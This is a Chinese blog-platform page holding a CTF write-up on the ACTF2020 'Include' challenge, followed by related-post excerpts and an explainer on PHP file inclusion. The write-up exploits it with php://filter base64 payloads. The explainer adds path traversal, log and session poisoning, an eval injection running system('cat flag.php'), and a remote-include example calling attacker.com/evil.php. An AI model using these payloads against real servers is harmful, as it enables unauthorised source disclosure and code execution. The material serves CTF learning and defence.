一天一道CTF 第五天(filter协议文件包含)

最新推荐文章于 2025-09-05 10:53:13 发布
原创 最新推荐文章于 2025-09-05 10:53:13 发布 · 644 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了解决ACTF2020新生赛中Include挑战的方法。通过利用php://filter协议进行文件包含攻击,成功获取并解码了base64加密的flag。文章还提供了一个用于参考的链接。

[ACTF2020 新生赛]Include
网页里有个tips,点进去很容易发现就是在引导我们用文件包含
在这里插入图片描述
我们可以用php://filter协议来实施文件包含,payload为?file=php://filter/read=convert.base64-encode/resource=flag.php(或者把read=去掉也可以)
convert.base64-encode把读的内容进行base64-encode编码,resource=flag.php说明读取的文件。最后得到base64加密过的flag,网上找解码器即可。
在这里插入图片描述
文件包含漏洞可以参考https://www.smi1e.top

scrawman
关注
文件包含 [ACTF2020 新生赛]Include1(php://filter协议
一醉一休的博客
02-23 673
前言 服务器解析执行php文件时能够通过包含函数加载另外一个文件中的php代码,当被包含的文件中存在木马时,也就意味着木马程序会在服务器上加载执行 一、[ACTF2020 新生赛]Include1(php://filter协议) 1)一点开题目,没看到什么,点这个提示 2)只有这一句话 3)可以看到网址后面多了一个文件,也没有发现其他东西,可能是文件包含 4)文件包含直接读取的是文件,而不是文件源码,所以要想办法读取源码 php://filter/read=convert....
一天一道ctf 第57天(文件描述符 反弹shell)
scrawman的博客
08-19 829
[网鼎杯 2020 白虎组]PicDown 这题目还挺怪的,?url=/flag直接读取是非预期解 正常一步一步做下来是先看/proc/self/cmdline,查看本地使用过的命令,然后/proc/self/cwd/app.py看源码 from flask import Flask, Response from flask import render_template from flask import request import os import urllib app = Flask(__n
CTF题型 php filter特殊编码绕过小汇总
2501_90229053的博客
01-16 875
它的存在是数据流和控制流的“中间人”,有点类似我们抓包工具Burp的感觉,我们可以人为进行操控更改。对于小众编码的解码在线网站 https://www.novel.tools/decode/对于小众编码的解码在线网站 https://www.novel.tools/decode/在线工具:https://www.useotools.com/zh/rot13。将flag.php内容解释为UTF -8编码识别后转化为UTF-7进行输出。将flag.php内容解释为UTF-8后转化为UTF-7进行输出。
CTF中 php流包装器(过滤器)的原理和应用详细教程(全面)
最新发布
m0_53957485的博客
09-05 664
CTF(Capture The Flag)比赛中,PHP 流包装器是 Web 方向题目中的高频考点,尤其常与等场景结合。是 CTF 中读取文件源码的 “利器”,尤其适用于场景。当直接包含 PHP 文件时(如),文件会被执行而无法看到源码,此时可通过对文件内容进行编码(如 Base64),绕过执行并读取源码。
php filter 文件包含,php://filter(文件包含漏洞利用)及php://input
weixin_39990401的博客
03-10 414
1. php://filter文件包含漏洞:https://blog.youkuaiyun.com/fageweiketang/article/details/80699051 筛选过滤应用:1、 字符串过滤器:string.rot13 对字符串执行ROT13转换string.toupper转换为大写string.tolower 转换为小写string.strip_tags去除html和php标记2、 转换过...
data和filter协议文件包含
fzy2003的博客
07-05 726
掌握data协议filter协议的用法。
php filter 文件包含,文件包含lfi
weixin_30830161的博客
03-10 393
CG-CTF web(文件包含漏洞)php://filter 的使用:php://filter 的应用:1、利用base64获得源码2、通过读写编码实行绕过操作打开链接为下http://4.chinalover.sinaapp.com/web7/index.php?file=show.php搜索以后发现:“简单的文件包含,当发现url中有?file=字样时可以修改后面为?file=php://fi...
ctf中怎样获取php文件源码,CTF文件包含的一些技巧
weixin_39580682的博客
03-09 3958
前言文件包含CTF 比赛也是常考的一个点,这里对一些包含点的原理、特征进行一些总结,并结合实际的例子来讲解如何绕过。php伪协议的分类伪协议文件包含的基础,理解伪协议的的原理才能更好的利用文件包含漏洞。php://inputphp://input代表可以访问请求的原始数据,简单来说POST请求的情况下,php://input可以获取到post的数据。使用条件:include()、includ...
一天一道ctf 第50天(二次注入)
scrawman的博客
08-09 430
[CISCN2019 华北赛区 Day1 Web5]CyberPunk 查看源代码,可能有文件包含漏洞,直接读取是不行的,要用filter协议:?file=php://filter/convert.base64-encode/resource=index.php同样还可以拿到change.php,delete.php,confirm.php的源码。 代码审计,可以发现对SQL注入的参数进行了很严的过滤,但既然是题目肯定会给你造漏洞,就找那些过滤方法不一样的参数就行了。user_name和phone都用
一天一道ctf 第33天(反序列化字符串逃逸)
scrawman的博客
07-15 401
看界面很像sql注入,但是试了几次发觉不太行。dirsearch扫一下目录,找到了www.zip文件。 profile.php里有反序列化的代码,应该可以利用: <?php require_once('class.php'); if($_SESSION['username'] == null) { die('Login First'); } $username = $_SESSION['username']; $profile=$user->show_profile($use.
小迪笔记第 五十天 文件包含漏洞 && 远程包含 && 本地包含 && ctf练习题实战
2301_81155391的博客
12-11 853
文件包含漏洞 原理就是包含的文件如果可控就会造成这个漏洞php文件包含的特征 :PHP:include、require、include_once、require_once等一共是分为了2 种 一个就是。
ctf中怎样获取php文件源码,ctf中关于php伪协议的考查
weixin_33483567的博客
03-09 1570
原创: Archerx ...
CTF/CTF练习平台-flag在index里【php://filter的利用】
benli8541的博客
02-08 2504
原题内容: http://120.24.86.145:8005/post/ Mark一下这道题,前前后后弄了两个多小时,翻了一下别的博主的wp感觉还是讲的太粗了,这里总结下自己的理解: 首先打开这道题,页面只给你click me? no 点击进去显示test5 第一步,查看源代码,无果 第二步bp,无果 结合到题目,flag在index里,大胆尝试http://120.24.86.145:8005/post/index.php,可惜和之前一样 注意到了传值为http://1...
CTF/CTF练习平台-welcome to bugkuctf【php://filter及php://input】
热门推荐
Sp4rkW的博客
09-01 3万+
原题内容: http://120.24.86.145:8006/test1/ 首先bp一下,可见提示源码: &lt;!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&amp;&amp;(file_get_contents($...
base解码_php://filter在一次CTF中base被过滤的利用
weixin_39565910的博客
11-27 999
0x00 简介在一次线下ctf中的web题有一道关于php://filter协议的利用0x01题目分析靶机环境http://192.168.1.151:88/flag.php 存放flag信息的http://192.168.1.151:88/index.php 注释中有include1.phpinclude1代码如下error_reporting(0); @$file = $_G...
php://filterctf
m0_73973498的博客
10-11 948
这篇博客主要介绍的是php://filterctf中的常见利用,关于php:/filter的介绍可以去下面这篇博客,讲解的非常详细。
CTF文件包含漏洞-php://filter 流包装器 【详】
2302_79596028的博客
10-23 1928
本文详细介绍了CTF中对于文件包含漏洞可以使用的php://filter流包装器
php的filter协议ctf,PHP之filter协议
weixin_33274728的博客
04-08 729
php:// — 访问各个输入/输出流(I/O streams)php://input 是个可以访问请求的原始数据的只读流。php://filter 是一种设计用来允许过滤器程序在打开时成为流的封装协议。这对于单独具有完整功能的文件函数非常有用,否则就没有机会在读取内容之前将过滤器应用于流之上。该协议语法为:php://filter:/=比如 php://filter:/resource=http...
CTF Web php://filter文件内容包含漏洞
Drongin的博客
12-09 1万+
MCTF Web400 http://web.mirage-ctf.cn/web/8a43a97ced320c18ec254577a91a0d92/ 点击后发现PATH=flag这个很熟悉,有经验的老司机第一眼就会看出这里可能有php的文件包含漏洞,自己也百度了一下,通过这个漏洞可以看到源代码,加上php://filter/read=convert.base64-encode/resou
ctf文件包含
08-16
CTF竞赛中,文件包含漏洞(File Inclusion Vulnerability)是一种常见的安全漏洞,攻击者可以通过该漏洞读取或执行服务器上的任意文件,从而获取敏感信息(如Flag)或控制服务器。文件包含漏洞主要分为本地文件包含(Local File Inclusion, LFI)和远程文件包含(Remote File Inclusion, RFI),其中LFI更为常见,尤其在PHP环境中[^2]。 ### 本地文件包含(LFI)的常见利用方式 1. **路径遍历与敏感文件读取** 当应用程序使用用户输入作为文件路径且未进行充分过滤时,攻击者可以利用`../`等路径遍历字符访问敏感文件,如`/etc/passwd`或`flag.php`。例如,若存在如下代码: ```php include($_GET['page'] . ".php"); ``` 攻击者可以构造如下请求: ``` ?page=../../flag ``` 从而尝试包含并读取`flag.php`的内容[^1]。 2. **利用php://filter协议读取源码** 在某些情况下,直接读取文件可能被限制,但可以使用`php://filter`伪协议绕过限制,将文件内容以Base64编码形式返回。例如: ``` ?page=php://filter/convert.base64-encode/resource=flag ``` 这样可以避免直接输出PHP代码时被解析执行,而是返回其Base64编码形式,攻击者再进行解码即可获取原始内容[^1]。 3. **日志文件注入与包含** 如果攻击者可以向服务器写入内容(如通过User-Agent注入),可以尝试向服务器日志文件(如`/var/log/apache/access.log`)中注入PHP代码,再利用LFI包含该日志文件,从而实现远程代码执行(RCE)。 4. **会话文件包含** PHP默认会将用户会话信息存储在服务器上的临时文件中(如`/tmp/sess_PHPSESSID`)。攻击者可以通过设置特定的PHPSESSID,并在其值中注入PHP代码,再利用LFI包含该会话文件来执行代码。 ### 远程文件包含(RFI)的利用方式 虽然RFI在CTF中较少见,因为默认配置下`allow_url_include`和`allow_url_fopen`均为`Off`,但在某些特殊题目中可能会被启用。此时攻击者可以构造如下请求: ``` ?page=http://attacker.com/evil.php ``` 其中`evil.php`可以包含任意恶意代码,从而实现远程代码执行。 ### 示例题目解析 以Bugku CTF中的一道题为例,给出的PHP代码如下: ```php <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> ``` 此题的关键在于`eval`函数的使用,它将用户输入作为PHP代码执行。攻击者可以通过构造`hello`参数传入恶意代码,例如: ``` ?hello=system('cat flag.php'); ``` 从而直接读取`flag.php`的内容[^3]。 ### 常见防御与绕过技巧 - **输入过滤与白名单机制** 对用户输入进行严格过滤,避免路径遍历字符(如`../`)和伪协议的使用。 - **关闭危险配置** 确保`allow_url_include`和`allow_url_fopen`为`Off`,防止远程文件包含。 - **日志文件保护** 避免用户输入直接写入日志文件,或在日志中过滤特殊字符。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值